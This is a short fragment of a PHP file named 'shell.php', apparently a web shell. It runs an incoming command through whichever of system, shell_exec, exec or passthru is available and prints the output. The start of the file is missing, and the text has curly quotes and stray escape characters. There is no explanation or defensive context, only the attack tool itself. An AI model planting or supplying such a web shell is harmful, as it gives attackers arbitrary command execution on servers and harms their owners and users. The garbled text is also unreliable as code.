shell.php

\n”; if(function_exists(‘system’)) { system($cmd); } elseif(function_exists(‘shell_exec’)) { echo shell_exec($cmd); } elseif(function_exists(‘exec’)) { exec($cmd, $o); echo implode(“\n”,$o); } elseif(function_exists(‘passthru’)) { passthru($cmd); } else { echo “No exec functions”; } echo “\n

“;
}
?>